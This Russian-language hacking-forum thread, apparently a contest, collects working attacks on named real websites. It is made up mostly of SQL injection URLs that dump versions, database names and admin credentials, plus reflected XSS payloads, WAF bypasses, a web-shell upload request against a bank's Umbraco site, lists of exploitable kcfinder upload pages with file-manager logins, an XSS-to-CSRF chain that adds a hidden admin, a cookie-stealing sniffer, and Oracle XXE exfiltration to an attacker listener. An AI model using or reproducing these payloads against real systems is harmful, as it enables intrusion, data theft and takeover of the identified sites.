http://michiganlakeproducts.com/productpage.php?PID=[t]

Сайт: http://www.a3com.net/

Уязвимость: SQLi

Эксплоит:


http://www.a3com.net/product-list.php?cat_id=[t]

admina3com a3com@emirates.net.ae (mailto:a3com@emirates.net.ae) admin

Сайт: http://www.mslibrary.org/

Уязвимость: SQLi

Эксплоит:


http://www.mslibrary.org/mountjoy/cwp/browse.asp?c=43915&a=[t]&BMDRN=2000&BCOB=0

Сайт: http://rdmpro.com/

Уязвимость: SQLi

Эксплоит:


http://rdmpro.com/product-details.php?pid=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,[t],13,14,15,16,17

Сайт: http://www.estheticsglobal.com/

Уязвимость: SQLi

Эксплоит:


http://www.estheticsglobal.com/cat.php?id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10

Сайт: http://overlandindustries.com/

Уязвимость: SQLi

Эксплоит:


http://overlandindustries.com/productDetail.php?productID=999999.9 union all select 1,2,[t],4,5,6

Сайт: http://www.casacrystal.com/

Уязвимость: SQLi

Эксплоит:


http://www.casacrystal.com/detail.php?cid=[t]&id=3

Сайт: http://www.brightonretail.com/

Уязвимость: SQLi

Эксплоит:


http://www.brightonretail.com/calendar/monthly_view.php?cid=999999.9 union all select 1,2,3,4,5,[t],7,8--&catid=&m=10&w=5&y=2015&s=

Сайт: http://scclbd.com/

Уязвимость: SQLi

Эксплоит:


http://scclbd.com/viewproduct.php?prodid=999999.9 union all select 1,2,3,4,5,[t],7,8

aldemko
19.10.2015, 14:42
Всем привет

Прошу не судить строго - я вообще только начинаю читать мануалы

мой первый найденный SQL Inj (искал в ручную, перебирая сайты из выдачи Google)


http://www.illaricegrill.it/readnews.php?id=22+union+select+1,version(),databa se(),4,user()

5.5.38-35.2-log

icsa1_1

mi-_a-nics

Windows 2008 R2 or 7

ASP.NET, Microsoft IIS 7.5

MySQL 5.0.12

DBA: False

PS


http://www.trendy.dk/news/readnews.php?id=999999+union+select+1,2,user(),dat abase(),version(),6

White Raven
23.10.2015, 17:53
http://www.automodern.by (http://www.automodern.by/index.php?id=171)

1) Parameter s in /wordpress/?s=&=Search is vulnerable to ">alert('xss') XSS input. уязвимость XSS


http://www.automodern.by/wordpress/?s=">alert('xss')&=Search

2) Parameter id in /index.php?id=171 is vulnerable to ' input. уязвимость SQL


http://www.automodern.by:80/index.php?id='

ссори я новичок.

MaxFast
23.10.2015, 19:20
White Raven said:
↑ (https://antichat.live/posts/3906067/)
http://www.automodern.by (http://www.automodern.by/index.php?id=171)
1) Parameter s in /wordpress/?s=&=Search is vulnerable to ">alert('xss') XSS input. уязвимость XSS

http://www.automodern.by/wordpress/?s=">alert('xss')&=Search

2) Parameter id in /index.php?id=171 is vulnerable to ' input. уязвимость SQL

http://www.automodern.by:80/index.php?id='

ссори я новичок.




http://www.automodern.by/index.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24--

White Raven
23.10.2015, 19:34
↑ (https://antichat.live/posts/3906099/)

http://www.automodern.by/index.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24--



я не понял какой код писать что писать уязвимость нашел вроде

Shubka75
24.10.2015, 10:59
Сайт: www.pc-infopratique.com (http://www.pc-infopratique.com)

Уязвимость: SQLi

Эксплоит:


www.pc-infopratique.com/rss/down_rss.php?rub=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34--

SS_47
04.11.2015, 21:28
Сайт: http://www.wrekage.org/

Уязвимость: SQLi


http://www.wrekage.org/reviews.php?id=-1/*!50000union*//*!50000select*/1,/*!50000version()*/,3,4,5,6,7--

SS_47
04.11.2015, 23:34
Сайт: http://www.rochesterlancers.com/

Уязвимость: SQL injection


http://www.rochesterlancers.com/schedule/?season=10+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,version(),17,18,19,20,21,22,23,24,25,26, 27,28,29,30--

ubepkr
26.11.2015, 11:24
Сайт: https://www.silhouettedesignstore.com/

Уязвимость: Reflected XSS (циклящийся (понаблюдайте за страницей), можно без '"-->, но так интереснее))))


https://www.silhouettedesignstore.com/designs?search='"-->alert(123)


там же Frame Injections


https://www.silhouettedesignstore.com/designs?search=

Сайт: http://getbitco.com/

Уязвимость: Reflected XSS


http://getbitco.com/?ans=Erroralert(123456789)


Сайт: http://http:/bitganancias.com/

Уязвимость: XSS







HTMLFormElement.prototype.submit.call(document.for ms[0]);

Jup1ter_
27.11.2015, 12:54
SQLi

http://www.ataegitim.com.tr/yurtdisi_egitim.php?id=1+union+select+1,2,3,versio n(),5,6,7 (http://www.ataegitim.com.tr/yurtdisi_egitim.php?id=1+union+select+1,2,3,versio n%28%29,5,6,7)

http://www.bursaymmo.org.tr/fotografgalerisi/haber_oku.php?haber_id=14+union+select+version(),2 ,3,4,5,6 (http://www.bursaymmo.org.tr/fotografgalerisi/haber_oku.php?haber_id=14+union+select+version%28% 29,2,3,4,5,6)

http://www.sistemkalip.com.tr/tr/haber_detay.php?recordID=1+union+select+1,2,versio n(),4,5,6 (http://www.sistemkalip.com.tr/tr/haber_detay.php?recordID=1+union+select+1,2,versio n%28%29,4,5,6)

ubepkr
28.11.2015, 17:22
Сайт: http://www.academyplazahotel.ie/

Уязвимость: Reflected XSS


http://www.academyplazahotel.ie/booknow.php?bg=FFFFFF&color='"-->alert(1234567890)

Сайт: http://www.cleanrooms-ireland.ie

Уязвимость: Reflected XSS


http://www.cleanrooms-ireland.ie/w/link.cfm?w_y=4&w_u='"-->alert(1234567890)

там же: (?redirect?)


http://www.cleanrooms-ireland.ie/w/llink.cfm?w_y=4&w_u=http://google.com

Сайт: http://forums.somethingawful.com

Уязвимость: Reflected XSS


http://forums.somethingawful.com/account.php?action=loginform&next=/member.php"()%26%25alert(1234567890)

Сайт: http://www.zoommoola.com

Уязвимость: Reflected XSS


http://www.zoommoola.com/?ref='"-->alert(1234567890)

Сайт: http://www.usatestprep.com

Уязвимость: Reflected XSS


http://www.usatestprep.com/modules/map/_brains/map_product.php?id=&page=landing'"()&%alert(123456)

Сайт: http://txbra.org

Уязвимость: XSS






HTMLFormElement.prototype.submit.call(document.for ms[0]);

Jup1ter_
02.12.2015, 15:15
Конкурс уже не актуален?

http://www.tontomarine.co.uk/boat.p...4,5,version(),7,8,9,0,11,12,13,14,15,16,1 7,18 (http://www.tontomarine.co.uk/boat.php?product_id=1+union+select+1,2,3,4,5,versi on%28%29,7,8,9,0,11,12,13,14,15,16,17,18)

faza02
21.12.2015, 14:15
актуален, времени пока нет разгрести. позже всем добавлю

Octavian
31.12.2015, 20:41
Remote Code Execution

Сайт: ecb.md

Эксплоит:


POST /umbraco/webservices/codeEditorSave.asmx HTTP/1.1
SOAPAction: "http://tempuri.org/SaveDLRScript"
Content-Type: text/xml
Host: ecb.md
Content-Length: 710
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*



/..\\..\\..\\umbraco\\shell.aspx
string


Код шелла .aspx,в burpsuite выбираем
Convert selection->Html->Html encode key characters
так прошел через фильтрацию

1




Заливается тут ecb.md/umbraco/shell.aspx

chatanti
01.01.2016, 01:15
зашел на ecb.md, стало страшно, ушел)

Octavian
01.01.2016, 01:19
↑ (https://antichat.live/posts/3934680/)
зашел на ecb.md, стало страшно, ушел)


Месныи банк )

BabaDook
04.01.2016, 16:00
↑ (https://antichat.live/posts/3935896/)
Сайт:
http://www.cobranet.org/
Уязвимость: SQL injection

http://www.cobranet.org/about.php?id=1+union+select+1,2,3,4,5,6

к сожалению дальше не раскрутил.


Вы уже всё сделали


http://www.cobranet.org/about.php?id=1+union+select+1,database(),3,user(), 5,6+--+-

AAI
04.01.2016, 19:07
Сайт: www.normatech.it/login-admin.asp (http://www.normatech.it/login-admin.asp)

Уязвимость:SQL injection


login: ' or '1'='1
pass: ' or '1'='1

R3hab
06.01.2016, 12:12
AAI,

.SpoilerTarget" type="button">Spoiler
SQL Инъекции1 (https://antichat.live/threads/21336/page-544/)

SQL Инъекции2 (https://antichat.live/threads/424558/page-2/)

AAI
06.01.2016, 17:50
↑ (https://antichat.live/posts/3936668/)
AAI,
Spoiler
SQL Инъекции1 (https://antichat.live/threads/21336/page-544/)
SQL Инъекции2 (https://antichat.live/threads/424558/page-2/)


Парю проверять! Спасибо.

nordwarrior
22.01.2016, 23:46
SQL-i, обход mod_security


http://thewallis.org/showinfo.php?id=-1+/*!50000UNION+select+null,concat_ws%280x3a,TABLE_NA ME,%20COLUMN_NAME%29+/**/FROM+/**/INFORMATION_SCHEMA.COLUMNS/**/+LIMIT+0,800*/

lastbyte
17.02.2016, 17:28
Сайт: https://api.lever.co

Уязвимость: отраженный xss

Эксплойт: https://api.lever.co/v0/postings/lever?mode=iframe&resize=javascript:window.location=alert('xss');// (https://api.lever.co/v0/postings/lever?mode=iframe&resize=javascript:window.location=alert(%27xss%27) ;//)

faza02
17.02.2016, 18:31
небольшие проблемы с хостингом и рейтингом, пока восстанавливаю

Octavian
19.02.2016, 23:07
Сайт: http://www.bri.gov.md/panel/login.php

Уязвимость: Отменяем редирект

Эксплойт:

Сайт: http://www.stroika.md/

Уязвимость: SQL injection

Эксплойт:


http://www.stroika.md/detail.php?id=1+UNION+SELECT+1,version(),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29+--+

Сайт: http://www.calidus.ro/

Уязвимость: SQL injection

Эксплойт:


http://www.calidus.ro/en/news.php?id=-1+UNION+SELECT+1%2Cusername%2C3%2Cuser_password+FR OM+users

Сайт: http://lukoil.md/ro/search_result

Уязвимость: SQL injection (Post SQL-inj в поиске)

Эксплойт:


-1' UNION SELECT 1,2,user(),4,5,6 --

Сайт: http://mobile.airmoldova.md/

Уязвимость: SQL injection

Эксплойт:


http://mobile.airmoldova.md/special-offers-ru/?item=-9179)+UNION+SELECT+1,2,3,4,5,user_login,7,8,9,10,1 1,12,13,user_password,15,16,17,18,19,20,21,22,23,2 4,25+FROM+users+--+

Сайт: http://www.infocom.md/

Уязвимость: SQL injection

Эксплойт:


http://www.infocom.md/evenimente.php?id=13+UNION+SELECT+1,2,user(),versi on()+--+

Сайт: http://investigatii.md/

Уязвимость: SQL injection

Эксплойт:


http://investigatii.md/eng/comments.php?id=258+union+select+1,2,version(),use r(),5,6,7,8,9,database(),11,12,13,14

BabaDook
06.03.2016, 23:17
Невидимая ЭскуЭль инъекция


http://parfume.in.ua/parfumes.php?Gabanna&designer=DG&designers=Dolce&sort=1+and+sleep(12)+--+-

АштиМиЭль Всовывание

[PHP]
[COLOR="#0000BB"]http:[COLOR="#FF8000"]//shops.ixi.ua/goods.php?goods=hello
mir

blacKK
18.03.2016, 15:25
select extractvalue(xmltype(']>'|| '&' ||'xxe;'),'/l') from dual;
Возникает следующая ошибка:
ORA-31020: The operation is not allowed,
Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31020. 00000 - "The operation is not allowed, Reason: %s"
*Cause: The operation attempted is not allowed
*Action: See reason and change to a valid operation.
select extractvalue(xmltype(' %remote; %param1;]>'),'/l') from dual;
При запуске запроса выше на сервере баз данных возникнет та же сама ошибка (ORA-31020). Однако в этот раз сервер отсылает HTTP-запрос на ресурс с именем «test». Ниже приведен лог HTTP-запросов с сервера злоумышленника:
ncat -lvp 80
Ncat: Version 6.25 (
http://nmap.org/ncat
)
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from DB_IP.
Ncat: Connection from DB_IP:27320.
GET /test HTTP/1.0
Host: DB_IP
Content-Type: text/plain; charset=utf-8
select extractvalue(xmltype(' %remote; %param1;]>'),'/l') from dual;
После запуска запроса возникает следующая ошибка (обратите внимание, что код ошибки отличается, поскольку предоставленные учетные данные не могут быть использованы для авторизации на удаленном FTP-сервере).
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00202: could not open "ftp://SYSTEM:bar@IP/test" (error 402)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31011. 00000 - "XML parsing failed"
*Cause: XML parser returned an error while trying to parse the document.
*Action: Check if the document to be parsed is valid.
Имя пользователя базы данных включено в FTP-трафик и отсылается на сервер злоумышленника как имя пользователя FTP-сервера:
СКРИН НЕ ВЫХОДИТ ЗАЛИТЬ ХЗ МОЖЕТ ПРАВ НЕ ХВАТАЕТ ....

crlf
18.03.2016, 16:19
Тема для Wordpress

Avada #1 Selling Theme of All Time (190,000+ Satisfied Customers (http://avada.theme-fusion.com/))

inurl:"product_orderby" (Результатов: примерно 8 840 000 (0,63 сек.) (https://www.google.com/search?q=inurl%3A"product_orderby"))

./includes/woo-config.php


if ( isset($_SERVER['QUERY_STRING'] ) ) {
parse_str($_SERVER['QUERY_STRING'],$params);
}
$order= ! empty($params['product_order'] ) ?$params['product_order'] :'desc';
$order=strtoupper($order);

$args['orderby'] ="sum_of_comments_approved DESC, average_rating{$o rder},$wpdb->posts.post_date DESC";



Получается Time-Based Blind SQL Injection:


http:// site.com/shop/?product_orderby=rating&product_order=DESC,CASE+1+WHEN+ASCII(substring(ver sion(),1,1))=53+THEN+SLEEP(0)+ELSE+SLEEP(1)+END+AS C+--+1



В тонкости не вдавался, похоже что спит так: количество сортируемых товаров * sleep(). Подверженные версии, скорее всего,

crlf
18.03.2016, 17:59
MagentoDownloader - 1.x

Reflected XSS














./downloader.php:


public functionvalidateAction()
{
...

if (isset($_GET['action']) &&$_GET['action'] =='checkdb') {
$this->_session['host'] =$this->_helper->getPost('host');
$this->_session['username'] =$this->_helper->getPost('username');
$this->_session['database'] =$this->_helper->getPost('database');

...

public functiongetPost($key=null,$default=nul l)
{
if (is_null($key)) {
return$_POST;
}
if (isset($_POST[$key])) {
return$_POST[$key];
}
return$default;
}
...

$this->_helper->printHtmlValidateBlock($this->_session);

...

public functionprintHtmlValidateBlock($sessio n)
{
$host= isset($session['host']) ?$session['host'] :'localhost';
$username= isset($session['username']) ?$session['username'] :'';
$password= !empty($session['password']) ?'******':'';
echo

Database Connection
Database Connection

Host




User Name




User Password



HTML;
echo$this->printHtmlButtonSet(array('checkdb'=>'Check for InnoDB support'));
echo

HTML;
}



FPD

[QUOTE="None"]
Warning: PDO::__construct(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/downloader.php on line 191
Warning: PDO::__construct(): [2002] php_network_getaddresses: getaddrinfo failed: Name or service not known (trying to connect via tcp://">[/COLOR]_connection= newPDO($dsn,$username,$password);
} catch (PDOException $e) {
$this->addError('Access denied for user '.$username.' @'.$host);
}
return$this;
}

[/COLOR]
[/PHP]

t0ma5
07.04.2016, 18:36
↑ (https://antichat.live/posts/3971297/)
sql inj
сайт dogarchive.kennel-apbt.com


называется найди уязвимость)?

читайте правила оформления постов

Сайт: http://pedigree.gamedogs.cz

Уязвимость: SQL Injection


http://pedigree.gamedogs.cz/managePerson.php?personId=-966+union+select+1,2,3,4,5,6,7,8,9,version%28%29,1 1,12+--+s

10.0.23-MariaDB-0+deb8u1 (http://pedigree.gamedogs.cz/10.0.23-MariaDB-0+deb8u1)

Octavian
26.04.2016, 16:37
Саит http://www.francophonie.utm.md/

Уязвимость: SQL Injection

Сплоит http://www.francophonie.utm.md/?mop=15&idnews=15+union+select+1,2,3,user(),5,version(),7, 8+--+

MaxxWell
26.08.2016, 00:30
http://kupigut.ru/shop.php?id=-fashionid%27+union+all+select+1,2,3,4,5,6,(select( @x)from(select(@x:=0x00),(select(0)from(informatio n_schema.columns)where(table_schema!=0x696e666f726 d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@ x,0x3c62723e,table_schema,0x2e,table_name,0x3a,col umn_name))))x),8,9,10,11,12+--+

Тип: SQL Injection.

================================================== ========




http://hd-ural.ru/news.php?news_id=-48+union+all+select+1,2,3,4,5,6,7,8,9,10,11,(selec t(@x)from(select(@x:=0x00),(select(0)from(informat ion_schema.columns)where(table_schema!=0x696e666f7 26d6174696f6e5f736368656d61)and(0x00)in(@x:=concat (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))))x),13,14+--+

Тип:SQL Ijection (вывод в title, Cntr+u)

================================================== ========




http://allrose.ru/category.php?id=-1%27+union+all+select+1,(select(@x)from(select(@x: =0x00),(select(0)from(information_schema.columns)w here(table_schema!=0x696e666f726d6174696f6e5f73636 8656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table _schema,0x2e,table_name,0x3a,column_name))))x)+--+




Тип:SQL Injection

NonBlizz
28.08.2016, 23:21
ТИЦ:10PR:2


ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,concat_ws(database(),user(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+

Вывод таблиц:


ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,(select(@x) from(select(@x:=0x00),(select(0)from(information_s chema.columns)where(table_schema!=0x696e666f726d61 74696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0 x3c62723e,table_schema,0x2e,table_name,0x3a,column _name))))x),9,10,11,12,13,14,15,16+--+

Вывод админа:


ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,concat_ws(0 x3,username,password),9,10,11,12,13,14,15,16+from+ heterodrugs.users+--+

Version (5.5.49-cll-lve)

Database (heterodrugs)

User (hetero582016@localhost)

Для простоты действий:

ttp://heteroworld.com/cpanel/

ttp://heteroworld.com/info.php

P.S в Cpanel с этими данными так и не смог зайти. Кто зальётся отпишитесь=)

PoliGroS
14.09.2016, 00:02
↑ (https://antichat.live/posts/3984821/)

http://kupigut.ru/shop.php?id=-fashionid%27+union+all+select+1,2,3,4,5,6,(select( @x)from(select(@x:=0x00),(select(0)from(informatio n_schema.columns)where(table_schema!=0x696e666f726 d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@ x,0x3c62723e,table_schema,0x2e,table_name,0x3a,col umn_name))))x),8,9,10,11,12+--+

Тип:
SQL Injection.


Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).

Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/ - нет никакой статистики.

Octavian
26.03.2017, 13:12
Предсказываем отправлений url при восстановлении пароля md5(time()) взламываем любои аккаунт


https://www.andys.md/ro/pages/login/
http://www.andys.md/pages/restore_pass/24aedcd90a28ae58303e0a8b8906137b/

Octavian
03.08.2017, 15:14
2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу )

При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора


http://supergut.md/ru/pages/cart/3/

Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении)

Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит





tr:last-child{display:none;}">







Почему в логине


tr:last-child{display:none;}

потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице

Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так



location="http://host/csrf.html";


Не прошло и 5 минут я был уже в админке

http://i.imgur.com/7yNDiONl.jpg

После этого была оповещена администрация которая на 2 день профиксела

SooLFaa
03.08.2017, 21:15
↑ (https://antichat.live/posts/4113101/)
2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу )
При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора

http://supergut.md/ru/pages/cart/3/

Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении)
Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит




tr:last-child{display:none;}">







Почему в логине

tr:last-child{display:none;}

потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице
Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так


location="http://host/csrf.html";


Не прошло и 5 минут я был уже в админке
http://i.imgur.com/7yNDiONl.jpg
После этого была оповещена администрация которая на 2 день профиксела


Очень хорошая демонстрация, как XSS и CSRF на практике применяется.

Octavian
29.08.2017, 21:05
Раскрытие данных


http://www.termosuport.md/admin/

tro0st
17.09.2017, 11:51
↑ (https://antichat.live/posts/4128994/)
Приветствую форумчане, подскажите пожалуйста нубу, можно ли как-то узнать привязана ли к номеру телефона страница в вк? Соррян за оффтоп, пока не могу отвечать в теме "В контакте".


Восстановление пароля, "не помню номер телефона"(если такое выскачило, то привязана), вводишь данные страницы, ФИО и получаешь ответ на свой вопрос.

Octavian
17.09.2017, 22:56
↑ (https://antichat.live/posts/4129245/)
Будь осторожен с этим.
http://s019.radikal.ru/i615/1709/29/b0e205f0d6f4.png (http://radikal.ru)


Зачем

BigBear
07.10.2017, 18:57
↑ (https://antichat.live/posts/4129263/)
Зачем


MD5( 123456 ) = e10adc3949ba59abbe56e057f20f883e (http://tool-bar.appspot.com/hash?input=123456)

Я думал, этот хэш все знают наизусть. Смысл его замазывать?)

Octavian
07.10.2017, 19:23
↑ (https://antichat.live/posts/4136275/)
MD5( 123456 ) = e10adc3949ba59abbe56e057f20f883e (http://tool-bar.appspot.com/hash?input=123456)

Я думал, этот хэш все знают наизусть. Смысл его замазывать?)


бабадука спроси

PS:Сиски тоже видели все но на ютубе их замазывают

f0b0s
08.10.2017, 09:56
Сайт:http://www.vacbanned.com (http://www.vacbanned.com)

Уязвимость: SQL Injection

Эксплойт:


http://www.vacbanned.com:80/view/detail/id/76561197960265741) AND 3612=3612 AND (8789=8789

MySQL > 5.0.11

available databases [3]:

information_schema

vacbanned_dev

vacbanned_v2

Octavian
01.11.2017, 01:04
Засунул в инпутах фейка https://wf-code.ru

[CODE]
">img = new Image(); img.src = "/snif.php?c="+document.cookie+window.location.href;

BabaDook
06.12.2017, 14:21
SSRF Подъехала


https://us.hidester.co


.SpoilerTarget" type="button">Spoiler
http://s018.radikal.ru/i505/1712/03/a0c7c6b851dc.png
Кто сможет перейти на другой протокол пишите метод

Octavian
01.02.2018, 23:48
Arbitrary file upload 1.php.asd


http://ecaterix.md/ecaterix.md/kcfinder/browse.php
http://www.basukiwater.com/assets/js/mylibs/kcfinder/browse.php
http://www.oonohousing.com/member/user/kcfinder/browse.php
http://www.golfoldcourse.com/kcfinder/browse.php
http://www.careersinmorocco.com/www3/assets/js/ckeditor/kcfinder/browse.php
http://dinamikadwiputraperkasajaya.com/admin/assets/kcfinder/browse.php
http://grossiste-tissus.fr/ckeditor/kcfinder/browse.php
http://ex-theatreasia.com/kcfinder/browse.php
http://tohmei-group.sakura.ne.jp/user_data/packages/admin/js/kcfinder/browse.php
http://www.urfaposet.com/panel/kcfinder/browse.php
http://www.raksthai.org/asset/kcfinder/
http://www.godimex.pl/sklep/design/_js_libs/ckeditor/kcfinder/browse.php
http://hadu.org/kcfinder/browse.php

Гуглом можно насобирать сайтов

Octavian
02.02.2018, 00:04
↑ (https://antichat.live/posts/4179843/)
Если честно, то к сожалению я ничего не понял, распиши пожалуйста где там уязвимость .


Можем загружать PHP фаилы

L:fm_admin

P:fm_admin


http://ecaterix.md/ecaterix.md/kcfinder/upload/files/filemanager.php.asd

erwerr2321
03.04.2018, 20:50
там оно всё дырявое куда не ткни...

писать бесполезно - пишут, что всё починили и всё работает.

.SpoilerTarget" type="button">Spoiler: Onesecurity - unsecure


curl -s -k --proxy socks5://127.0.0.1:9150 http://onesecurity.zyxel.com/php/wizard.php --data "instruction=get_wizards&parameters%5Btype%5D=z%27 union select 1,@@version--+&parameters%5Bdirection%5D=DESC&parameters%5Bget_active%5D=true"

"Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6002: Service Pack 2)"

BabaDook
08.04.2018, 18:52
.SpoilerTarget" type="button">Spoiler
http://polisk.kiev.ua/prod_download.php?id=1+and+false+UnIoN SELect 1,2,user(),4&ext= (http://polisk.kiev.ua/prod_download.php?id=1+and+false+%55%6e%49%6f%4e%2 0%53%45%4c%65%63%74%201,2,user(),4&ext=)

http://sclass.kiev.ua/im.php?show=groupsrecifications&kod_group=10)+/*!12345UnIoN*/+SeLEcT+user()+--+-&specifications=W126'' (http://sclass.kiev.ua/im.php?show=groupsrecifications&kod_group=10)+/*!12345UnIoN*/+SeLEcT+user()+--+-&specifications=W126%27%27)

http://xenon77.com.ua/production_list.php?id=-1+UnIoN+SeLEct+1,2,3,4,user(),6,7,8

http://www.newchemistry.ru/himbases...,table_name,0x3a,column_name))),@))),3, 4+--+- (http://www.newchemistry.ru/himbases.php?ID=-1+UnIoN+SeLEct+1,(select(select+concat(@:=0xa7,(se lect+count(*)from(information_schema.columns)where (@:=concat(@,0x3c6c693e,table_name,0x3a,column_nam e))),@))),3,4+--+-)

karkajoi
10.04.2018, 16:10
↑ (https://antichat.live/posts/4197794/)
XSS
http://www.task.ua/funds/?id=1&language=
alert(123);


+ sql inject


http://www.task.ua/funds/?id=1&language='and updatexml(NULL,concat(0x0a,(SELECT database())),Null)-- -

BabaDook
14.04.2018, 18:25
https://www.ecoresurs24.ru/index.ph...+from+InfOrMaTioN_schema.TaBleS limit 51,1 (https://www.ecoresurs24.ru/index.php?&id=-13+UnIon%20SelEcT+TaBle_name+from+InfOrMaTioN_sche ma.TaBleS%20%20%20limit%20%2051,1)

Дальше лень чё та

Veil
05.06.2018, 15:50
https://www.livewireindia.com/livehack/

POST

submit=Submit&centre=others&college=1&district=others&email='and extractvalue(0x0a,concat(0x0a,(select user())))+--+-'&mobile=987-65-4329&name=ttiuvuqg&state=6&year=2016&year1=1967

Jerri
19.07.2018, 21:20
http://shrigangapharmacy.com/details.php?mno=3&pid=-1'union+select+1,1,(select+concat(0x53714c69,mid(( concat(concat_ws(0x04,version(),database(),user()) ,0x01030307)),1,113505))),1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1--+1

BabaDook
23.08.2019, 00:48
https://www.reso.ru/Aux/result.html?action=search&parsedQuery=345&matchesPerPage=5&displayPages=7&index=RESOSiteIndex&searchString=%3Cscript%3Ealert(document.domain);%3 C/script%3E&searchPage=53